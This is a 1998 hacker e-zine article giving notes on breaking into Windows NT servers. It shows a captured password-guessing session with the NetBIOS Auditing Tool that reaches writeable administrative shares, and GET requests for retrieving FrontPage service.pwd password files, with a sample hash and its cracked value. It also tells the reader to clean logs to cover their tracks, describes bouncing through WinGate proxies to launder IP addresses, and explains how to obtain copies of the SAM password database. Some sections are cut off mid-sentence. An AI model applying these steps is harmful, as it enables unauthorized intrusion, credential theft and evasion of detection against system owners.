*SWAT MAGAZINE ISSUE TWELVE: DECEMBER 1998* ********************************************************************** | .Verious notes on windows NT. | | By Netw0rk bug | ----------------------------------------------------------------------- =Contents= Notes On DLL Files TCp/UDP Port Numbers Notes On The Nat Command RPC - Remote Procedure Calls The Fromtpage Service Password Notes On Wingate Recognising NT Servers NT Accounts And Passwords The NT Password File Notes On NETBIOS ========================================================================= NOTES ON DLL FILES ========================================================================= Authentication (GINA) module, specifically MSGINA.DLL. Under certain conditions, this file can be replaced, which is how you would change the SAS key combination. ------------------------------------------------------------------------- Windows NT 4.0 Service Pack 2 and later includes a password filter DLL file (Passfilt.dll) that lets you enforce stronger password requirements for users. Passfilt.dll provides enhanced security against "password guessing" or "dictionary attacks" by outside intruders. Passfilt.dll implements the following password policy: ? Passwords must be at least six (6) characters long. (The minimum password length can be increased further by setting a higher value in the Password Policy for the domain). ? Passwords must contain characters from at least three (3) of the following four (4) classes: Description Examples English upper case letters A, B, C, ... Z English lower case letters a, b, c, ... z Westernized Arabic numerals 0, 1, 2, ... 9 Non-alphanumeric ("special characters") such as punctuation symbols ? Passwords may not contain your user name or any part of your full name. These requirements are hard-coded in the Passfilt.dll file and cannot be changed through the user interface or registry. If you wish to raise or lower these requirements, you may write your own .dll and implement it in the same fashion as the Microsoft version that is available with Windows NT 4.0 Service Pack 2. ========================================================================= TCP/UDP PORT NUMBERS ========================================================================= Service Port Comments TCP Ports echo 7/tcp discard 9/tcp sink null systat 11/tcp users daytime 13/tcp netstat 15/tcp qotd 17/tcp quote chargen 19/tcp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver name 42/tcp nameserver whois 43/tcp nicname nameserver 53/tcp domain apts 57/tcp any private terminal service apfs 59/tcp any private file service rje 77/tcp netrjs finger 79/tcp http 80/tcp link 87/tcp ttylink supdup 95/tcp newacct 100/tcp [unauthorized use] hostnames 101/tcp hostname iso-tsap 102/tcp tsap x400 103/tcp x400-snd 104/tcp csnet-ns 105/tcp CSNET Name Service pop-2 109/tcp Post Office Protocol version 2 pop-3 110/tcp Post Office Protocol version 3 sunrpc 111/tcp auth 113/tcp authentication sftp 115/tcp uucp-path 117/tcp nntp 119/tcp usenet readnews untp ntp 123/tcp network time protocol statsrv 133/tcp profile 136/tcp NeWS 144/tcp news print-srv 170/tcp https 443/tcp Secure HTTP exec 512/tcp remote process execution; authentication performed using passwords and UNIX loppgin names login 513/tcp remote login a la telnet; automatic authentication performed based on priviledged port numbers and distributed data bases which identify "authentication domains" cmd 514/tcp like exec, but automatic authentication is performed as for login server printer 515/tcp spooler efs 520/tcp extended file name server tempo 526/tcp newdate courier 530/tcp rpc conference 531/tcp chat netnews 532/tcp readnews uucp 540/tcp uucpd klogin 543/tcp kshell 544/tcp krcmd dsf 555/tcp remotefs 556/tcp rfs server chshell 562/tcp chcmd meter 570/tcp demon pcserver 600/tcp Sun IPC server nqs 607/tcp nqs mdqs 666/tcp rfile 750/tcp pump 751/tcp qrh 752/tcp rrh 753/tcp tell 754/tcp send nlogin 758/tcp con 759/tcp ns 760/tcp rxe 761/tcp quotad 762/tcp cycleserv 763/tcp omserv 764/tcp webster 765/tcp phonebook 767/tcp phone vid 769/tcp rtip 771/tcp cycleserv2 772/tcp submit 773/tcp rpasswd 774/tcp entomb 775/tcp wpages 776/tcp wpgs 780/tcp mdbs 800/tcp device 801/tcp maitrd 997/tcp busboy 998/tcp garcon 999/tcp blackjack 1025/tcp network blackjack bbn-mmc 1347/tcp multi media conferencing bbn-mmx 1348/tcp multi media conferencing orasrv 1525/tcp oracle ingreslock 1524/tcp issd 1600/tcp nkd 1650/tcp dc 2001/tcp mailbox 2004/tcp berknet 2005/tcp invokator 2006/tcp dectalk 2007/tcp conf 2008/tcp news 2009/tcp search 2010/tcp raid-cc 2011/tcp raid ttyinfo 2012/tcp raid-am 2013/tcp troff 2014/tcp cypress 2015/tcp cypress-stat 2017/tcp terminaldb 2018/tcp whosockami 2019/tcp servexec 2021/tcp down 2022/tcp ellpack 2025/tcp shadowserver 2027/tcp submitserver 2028/tcp device2 2030/tcp blackboard 2032/tcp glogger 2033/tcp scoremgr 2034/tcp imsldoc 2035/tcp objectmanager 2038/tcp lam 2040/tcp interbase 2041/tcp isis 2042/tcp rimsl 2044/tcp dls 2047/tcp dls-monitor 2048/tcp shilp 2049/tcp NSWS 3049/tcp rfa 4672/tcp remote file access server complexmain 5000/tcp complexlink 5001/tcp padl2sim 5236/tcp man 9535/tcp UDP Ports echo 7/udp discard 9/udp sink null systat 11/udp users daytime 13/udp netstat 15/udp qotd 17/udp quote chargen 19/udp ttytst source time 37/udp timserver rlp 39/udp resource name 42/udp nameserver whois 43/udp nicname nameserver 53/udp domain bootps 67/udp bootp bootpc 68/udp tftp 69/udp sunrpc 111/udp erpc 121/udp ntp 123/udp statsrv 133/udp profile 136/udp snmp 161/udp snmp-trap 162/udp at-rtmp 201/udp at-nbp 202/udp at-3 203/udp at-echo 204/udp at-5 205/udp at-zis 206/udp at-7 207/udp at-8 208/udp biff 512/udp used by mail system to notify users of new mail received; currently receives messages only from processes on the same machine who 513/udp maintains data bases showing who's logged in to machines on a local net and the load average of the machine syslog 514/udp talk 517/udp like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established) ntalk 518/udp utime 519/udp unixtime router 520/udp local routing process (on site); uses variant of Xerox NS routing information protocol timed 525/udp timeserver netwall 533/udp for emergency broadcasts new-rwho 550/udp new-who rmonitor 560/udp rmonitord monitor 561/udp meter 571/udp udemon elcsd 704/udp errlog copy/server daemon loadav 750/udp vid 769/udp cadlock 770/udp notify 773/udp acmaint_dbd 774/udp acmaint_trnsd 775/udp wpages 776/udp puparp 998/udp applix 999/udp Applix ac puprouter 999/udp cadlock 1000/udp hermes 1248/udp wizard 2001/udp curry globe 2002/udp emce 2004/udp CCWS mm conf oracle 2005/udp raid-cc 2006/udp raid raid-am 2007/udp terminaldb 2008/udp whosockami 2009/udp pipe_server 2010/udp servserv 2011/udp raid-ac 2012/udp raid-cd 2013/udp raid-sf 2014/udp raid-cs 2015/udp bootserver 2016/udp bootclient 2017/udp rellpack 2018/udp about 2019/udp xinupagesrver 2020/udp xinuexpnsion1 2021/udp xinuexpnsion2 2022/udp xinuexpnsion3 2023/udp xinuexpnsion4 2024/udp xribs 2025/udp scrabble 2026/udp isis 2042/udp isis-bcast 2043/udp rimsl 2044/udp cdfunc 2045/udp sdfunc 2046/udp dls 2047/udp shilp 2049/udp rmontor_scure 5145/udp xdsxdm 6558/udp isode-dua 17007/udp ========================================================================= NOTES ON THE NAT COMMAND ========================================================================= NAT.EXE [-o filename] [-u userlist] [-p passlist]
Switches: -o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output. -u Specify the file to read usernames from. Usernames will be read from the specified file when attempt- ing to guess the password on the remote server. Usernames should appear one per line in the speci- fied file. -p Specify the file to read passwords from. Passwords will be read from the specified file when attempt- ing to guess the password on the remote server. Passwords should appear one per line in the speci- fied file.
Addresses should be specified in comma deliminated format, with no spaces. Valid address specifica- tions include: hostname - "hostname" is added 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20. hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1 All combinations of hostnames and address ranges as specified above are valid. Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us. C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: XXX.XX.XXX.XX [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997 [*]--- Timezone is UTC-6.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list: Server Comment --------- ------- STUDENT1 [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--- Attempting to access share: \\*SMBSERVER\Test [*]--- WARNING: Able to access share: \\*SMBSERVER\Test [*]--- Checking write access in: \\*SMBSERVER\Test [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out. ========================================================================= RPC (REMOTE PROCEDURE CALLS) ========================================================================= In order for NT to allow for various system services to be performed on a remote computer, it uses RPC, remote procedure calls. Please do not confuse this with SunRPC. You can run NT/RPC's over a NetBIOS/SMB session or you can piggie back it directly off of TCP/IP (or other transport protocol, perhaps NWLink IPX/SPX). Unfortunately we dont have any good documentation on what inherent services NT provides through native RPC. Complex server type programs (Like Exchange) provide their own RPC services in addition to the ones NT provides as an operating system --(TCP Port 135 is used as a port-mapper port, we also know that if too much information is fed through port 135, you can crash an NT box.). Some client software must access TCP port 135 before accessing the RPC service itself (hint, hint). Keep in mind that TCP port 135 can be blocked. Bummer, eh? ========================================================================= THE FONTPAGE SERVICE PASSWORD ========================================================================= The hacces.ctl file is sometimes called a shadow password file, well, this is not exactly correct. The file can give you a lot of information, including the location of the service password file. A complete example of the haccess.ctl file is given below: The #haccess.ctl file: # -FrontPage- Options None order deny,allow deny from all AuthName default_realm AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp Executing fpservwin.exe allows frontpage server extensions to be installed on port 443 (HTTPS)Secure Sockets Layer port 80 (HTTP) NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used instead of Frontpage. The following is a list of the Internet Information server files location in relation to the local hard drive (C:) and the web (www.target.com) C:\InetPub\wwwroot C:\InetPub\scripts /Scripts C:\InetPub\wwwroot\_vti_bin /_vti_bin C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut C:\InetPub\cgi-bin /cgi-bin C:\InetPub\wwwroot\srchadm /srchadm C:\WINNT\System32\inetserv\iisadmin /iisadmin C:\InetPub\wwwroot\_vti_pvt FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to: service.pwd contains the list of users and passwords for the FrontPage web. service.grp contains the list of groups (one group for authors and one for administrators in FrontPage). On Netscape servers, there are no service.grp files. The Netscape password files are: administrators.pwd for administrators authors.pwd for authors and administrators users.pwd for users, authors, and administrators C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample If Index Information Server is running under Internet Information Server: service.pwd (or any other file) can sometimes be retrieved. search for "#filename=*.pwd" C:\Program Files\Microsoft FrontPage\_vti_bin C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin C:\InetPub\ftproot The default location for the ftp The ftp service by default runs on the standard port 21. Check to see if anonymous connections are allowed. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT ; anonymous users do not log on using this user name and password. Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions. When installed, Internet Information Server's Setup created the account IUSR_computername in the Windows NT User Manager for Domains and in Internet Service Manager. This account was assigned a random password for both in Internet Service Manager and in the Windows NT User Manager for Domains. If changed, the password, you must change it in both places and make sure it matches. NOTE: Name and password are case sensitive Scanning PORT 80 (http) or 443 (https) options: GET /__vti_inf.html #Ensures that frontpage server extensions are installed. GET /_vti_pvt/service.pwd #Contains the encrypted password files. Not used on IIS and WebSite servers GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted names and passwords of authors. GET /_vti_pvt/administrators.pwd GET /_vti_log/author.log #If author.log is there it will need to be cleaned to cover your tracks GET /samples/search/queryhit.htm If service.pwd is obtained it will look similar to this: Vacuum:SGXJVl6OJ9zkE The above password is apple Turn it into DES format: Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash Other ways of obtaining service.pwd http://ftpsearch.com/index.html search for service.pwd http://www.alstavista.digital.com advanced search for link:"/_vti_pvt/service.pwd" ========================================================================= NOTES ON WINGATE ========================================================================= When you do a regular install of WinGate without changing things there are a few defaults: Port: | Service: 23 Telnet Proxy Server - This is default and running right after install. 1080 SOCKS Server - This once setup via GateKeeper has no password until you set one. 6667 IRC Mapping - This once setup via GateKeeper has no password until you set one. The biggest threat to your server is the port 23 telnet proxy. Port 1080 SOCKS Proxy The socks proxy is not installed by default but as soon as you use GateKeeper to install it. It installs with no password, unless you set one. If you are familiar with socks you know that there are many things you could do with it. Port 6667 IRC Proxy The irc proxy is like how we would do a wingate telnet proxy bounce to an irc server except the irc proxy is set to goto a certain server already. This is not set to run after install but after you do install it it setups with no password, unless you set one. Mr. Rodd. He had discovered this bug, had written an exploit for it, and had written a netscanner which would comb a specified netblock looking for vulnerable WinGate hosts. He managed to find that if one telnets to a WinGate host that is not properly secured (which was, until a week or so ago, the default state of these servers), one could telnet into and then back out of the WinGate server, which would "launder" one's actual IP address. Thereafter, if one mounted an attack on another machine, or if one sent e-mail by "hijacking" an open SMTP server, one would seem to be coming from the location of the WinGate server. This exploit was used to harass anti-spammers with untraceable e-mail, but one could well imagine that it could be used for a variety of other attacks. ========================================================================= RECOGNISING NT SERVERS ========================================================================= [11.2.1] How can tell if its an NT box? Hopefully it is a web server, and they've simply stated proudly "we're running NT", but don't expect that... Port scanning will find some. Typically you'll see port 135 open. This is no guarantee it's not Windows 95, however. Using Samba you should be able to connect and query for the existence of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check \CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first as Everyone has read permissions here by default. Port 137 is used for running NetBios over IP, and since in the Windows world NetBios is used, certainly you can expect port 137 to be open if IP is anywhere in use around NT. Another possible indication is checking for port 139. This tells you your target is advertising an SMB resource to share info, but it could be any number of things, such as a Windows 95 machine or even Windows for Workgroups. These may not be entirely out of the question as potential targets, but if you are after NT you will have to use a combination of the aforementioned techniques coupled with some common sense. To simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on remote systems. ========================================================================= NT ACCOUNTS AND PASSWORDS ========================================================================= There are two accounts that come with NT out of the box – administrator and guest. In a network environment, I have run into local administrator access unpassworded, since the Sys Admin thought that global accounts ruled over local ones. Therefore it is possible to gain initial access to an NT box by using its local administrator account with no password. Guest is another common unpassworded account, although recent shipments of NT disable the account by default. While it is possible that some companies will delete the guest account, some applications require it. If Microsoft Internet Studio needs to access data on another system, it will use guest for that remote access. You will find that by default all accounts in NT have complete SMB functionality. This includes the Guest account. (In WinNT 3.51, the guest is auto created and active, in WinNT 4.0, the guest account is auto created but is not active) Now, 2 things to remember: When it comes to login attempt failures, the administrator account IS NEVER locked out after a certain number of login attempts (this rule ALWAYS applies), also by default, when windows NT is installed, NONE of the accounts have fail login attempt lock out. Also, in order for SMB to work, UDP/TCP ports 137,138,139 (NetBIOS over TCP) must be ope ========================================================================= THE NT PASSWORD FILE ========================================================================= Accessing the password file in NT The location of what you need is in \\WINNT\SYSTEM32\CONFIG\SAM which is the location of the security database. This is usually world readable by default, but locked since it is in use by system compotents. It is possible that there are SAM.SAV files which could be readable. If so, these could be obtained for the purpose of getting password info. During the installation of NT a copy of the password database is put in \\WINNT\REPAIR. Since it was just installed, only the Administrator and Guest accounts will be there, but maybe Administrator is enough -- especially if the Administrator password is not changed after installation. ========================================================================= NOTES ON NETBIOS ========================================================================= NetBIOS over TCP/IP should normally be disabled for a firewall or web server. The following is a list of the ports used by NBT. ? NetBIOS-ns 137/tcp NETBIOS Name Service ? NetBIOS-ns 137/udp NETBIOS Name Service ? NetBIOS-dgm 138/tcp NETBIOS Datagram Service ? NetBIOS-dgm 138/udp NETBIOS Datagram Service ? NetBIOS-ssn 139/tcp NETBIOS Session Service ? NetBIOS-ssn 139/udp NETBIOS Session Service What exactly does the NetBios Auditing Tool do? Developed by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the complete source code. It is the "SATAN" of NetBios based systems. Here is a quote from Secure Networks Inc about the product - "The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services offered by the target system. It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client. The major steps are as follows: A UDP status query is sent to the target, which usually elicits a reply containing the Netbios "computer name". This is needed to establish a session. The reply also can contain other information such as the workgroup and account names of the machine's users. This part of the program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent back to UDP port 137 even if the original query came from some different port. TCP connections are made to the target's Netbios port [139], and session requests using the derived computer name are sent across. Various guesses at the computer name are also used, in case the status query failed or returned incomplete information. If all such attempts to establish a session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was reachable. Provided a connection is established Netbios "protocol levels" are now negotiated across the new connection. This establishes various modes and capabilities the client and server can use with each other, such as password encryption and if the server uses user-level or share-level Security. The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that protocol is somewhat simpler and uses a smaller password keyspace than NT. If the server requires further session setup to establish credentials, various defaults are attempted. Completely blank usernames and passwords are often allowed to set up "guest" connections to a server; if this fails then guesses are tried using fairly standard account names such as ADMINISTRATOR, and some of the names returned from the status query. Extensive username/password checking is NOT done at this point, since the aim is just to get the session established, but it should be noted that if this phase is reached at all MANY more guesses can be attempted and likely without the owner of the target being immediately aware of it. Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers. Attempts are then made to connect to all listed file system shares and some potentially unlisted ones. If the server requires passwords for the shares, defaults are attempted as described above for session setup. Any successful connections are then explored for writeability and some well- known file-naming problems [the ".." class of bugs]. If a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable" with the remaining question being to what extent. Information is collected under the appropriate vulnerability at most of these steps, since any point along the way be blocked by the Security configurations of the target. Most Microsoft-OS based servers and Unix SAMBA will yield computer names and share lists, but not allow actual file-sharing connections without a valid username and/or password. A remote connection to a share is therefore a possibly serious Security problem, and a connection that allows WRITING to the share almost certainly so. Printer and other "device" services offered by the server are currently ignored." If you need more info on NAT, try looking at this web location: http://www.secnet.com/ntinfo/ntaudit.html http://www.rhino9.org